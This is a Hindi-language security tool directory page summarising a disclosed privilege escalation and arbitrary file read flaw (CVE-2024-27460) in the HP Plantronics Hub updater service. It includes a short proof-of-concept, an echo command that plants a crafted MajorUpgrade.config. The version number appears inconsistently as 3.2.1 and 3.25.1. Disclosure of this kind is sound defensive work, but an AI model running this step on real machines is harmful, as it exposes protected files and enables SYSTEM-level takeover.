Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-27460 — HP Plantronics Hub 3.2.1 अपडेटर में विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/alaatk/cve-2024-27460
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubalaatk/cve-2024-27460

CVE-2024-27460

HP Plantronics Hub 3.2.1 अपडेटर में विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
42 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-27460

HP Plantronics Hub 3.25.1 अपडेटर विशेषाधिकार वृद्धि/मनमाना फ़ाइल पढ़ना

विवरण:

HP Plantronics Hub 3.25.1 में एक बग है जो निम्न-विशेषाधिकार वाले उपयोगकर्ताओं को उस मशीन पर SYSTEM के रूप में मनमाना फ़ाइल पढ़ने की अनुमति देता है जहाँ एप्लिकेशन स्थापित है। इसके अलावा, इस दोष का दुरुपयोग करके SYSTEM उपयोगकर्ता तक विशेषाधिकार बढ़ाना संभव है।

प्रभावित संस्करण

HP Plantronics Hub 3.25.1

प्रभावित सेवा(एँ)

असुरक्षित पथ: "C:\ProgramData\Plantronics\Spokes3G"

सेवा: PlantronicsUpdateService

पुनरुत्पादन के चरण (POC):

  • cmd.exe खोलें
  • cd C:\ProgramData\Plantronics\Spokes3G का उपयोग करके नेविगेट करें
  • echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
  • वांछित फ़ाइल "C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp" में कॉपी हो जाएगी, जिस तक किसी भी प्रमाणित उपयोगकर्ता की पहुँच है।

द्वारा खोजा गया:

  • फरीद ज़ेरौक डेलॉयट बेल्जियम के
  • अलाय कचौह मास्टरकार्ड यूरोप के
टूल डाउनलोड करें